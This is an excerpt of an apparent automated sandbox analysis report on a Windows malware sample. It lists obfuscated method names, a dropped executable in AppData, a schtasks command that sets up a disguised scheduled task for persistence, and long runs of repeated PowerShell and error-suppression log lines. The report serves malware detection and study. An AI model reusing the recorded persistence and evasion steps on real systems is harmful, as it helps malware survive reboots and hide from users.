                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, kO7RRbzNqdcLEk4N6o.csHigh entropy of concatenated method names: 'cbhEuJpOqI', 'U7yEva4HTb', 'QWhEr99SK1', 'ajwEV3X2ow', 'aQ2EkO9phU', 'iO1E3MfbhD', 'TslEekMKvU', 'VBREDUJl3j', 'awmEYKTteD', 'XbwEp92LtN'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.csHigh entropy of concatenated method names: 'C3Tqin4YMP', 'qhlq6qcBP1', 'cBEqIFULeR', 'QCgq2rl8FJ', 'ItvqLMTuH9', 'MPqqbjZjtA', 'yFsqtRNEJh', 'dN5q0XN4t8', 'SdQqdDU5bh', 'bd3qaVG9RM'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, uiDI5s48mgQyTGJUfk.csHigh entropy of concatenated method names: 'uFMFwDGdlP', 'QN7F9oRal0', 'L5yF4yLpsq', 'WtSF8yPbdQ', 'MoQFkTENCo', 'cWUFgMacQe', 'XQtF3JWafa', 'rD5FeTIAds', 'nT0FXssXYe', 'SWFFoRrPdK'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, k5acU6oGHp6rLuXhEB.csHigh entropy of concatenated method names: 'AvPt6a51qR', 'CvIt2QCWR0', 'Wo7tbWVYPm', 'fN2bxXv7W5', 'gZdbz0kXjg', 'yFrtHtBND0', 'xhPtAgyuTV', 'G69tU4udA0', 'w4Utq2g7Vy', 'DkZtCf06bX'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, uTCTviACRji3Yu4Tnva.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'o8JOf51p5g', 'LbhOEbNy72', 'nRPO7VsMs5', 'iuEOO6qh7s', 'FxBOPJjGiA', 'mrfONaFmDq', 'ySKODomf20'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, XruPHkJriYsOwyDPyJ.csHigh entropy of concatenated method names: 'UIOcvK9V6Q', 'BxncrOffaj', 'gukcVHU4su', 'dMSckTkgVS', 'sd6c345uvv', 'EYfceYRMrH', 'jGbcoSbxPx', 'PK2cGkXwTx', 'b3Zcw4xoYX', 'wGccT7ZsGo'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, qOVEovRFvsQVUi8gjw.csHigh entropy of concatenated method names: 'eyamSOZw9X', 'Aopmx4Ti2w', 'TsQhHEv4xH', 'uqihAA488i', 'pUdmT7DZ34', 'baem91LkeK', 'ApHmJPXuyK', 'Cx7m4YfawI', 'Jn8m8n740a', 'BJCmsuxCX2'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, DhsR1FCBNIhCMmXvii.csHigh entropy of concatenated method names: 'ELiAt9vnVJ', 'KefA03cnAd', 'liRAahtDMC', 'EdtAyegLtH', 'uqxAFWr9AY', 'G6rAQjxcGp', 'Y8ZIKh6BA8dYV4qaa6', 'TSQxok1BePHu9Gemk6', 'clZAA702ru', 'NcRAqUoXC2'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, EybHOUAAxXwm6QFEecI.csHigh entropy of concatenated method names: 'k57ExMKQvc', 'kA1EzpI7mp', 'jpH7HIOTC8', 'JPf7AUflLx', 'uo97UdkVO9', 'MWw7qoMW0c', 'iU57Caf4wk', 'sJt7i8njpv', 'jV676bNujA', 'FSQ7IQZIVj'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PjklEX2XWCOrPMYWlI.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MIIU5H8qyx', 'Pa6Ux7hhpG', 'P9oUzjvljf', 'pdZqHsIbAw', 'hYYqAINDFD', 'pxPqUhsfWX', 'GbKqqdLL9L', 'Gi2m99Iawy5DujcvbrW'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, RkKqPYxylAywnkp0Um.csHigh entropy of concatenated method names: 'KxyE2D4RWy', 'tFXEL8Xfaa', 'brREbyGOvm', 'j9TEtubWZQ', 'IJIEf6rHZi', 'XLaE0yrQrR', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, zasVD2AH3v4MkR5a6tM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLLET02dtB', 'uSgE9DVCwZ', 'R1wEJPEOwt', 'P3mE4vC0IU', 'X4uE8GHPL2', 'yLvEsNf5bA', 'uT7ElwuBDw'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, pBZQ1xjfYRGUj1Ye35.csHigh entropy of concatenated method names: 'o76fFSnR0S', 'f6kfmbl8Lu', 'J5OffxD1V8', 'Nocf7MD2KH', 'UNTfPP3vjp', 'dA6fDTjJ2O', 'Dispose', 'Jxbh6GOTxg', 'wTihIrOM8I', 'lNYh296XJg'
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile created: C:\Users\user\AppData\Roaming\aoTiGLRa.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
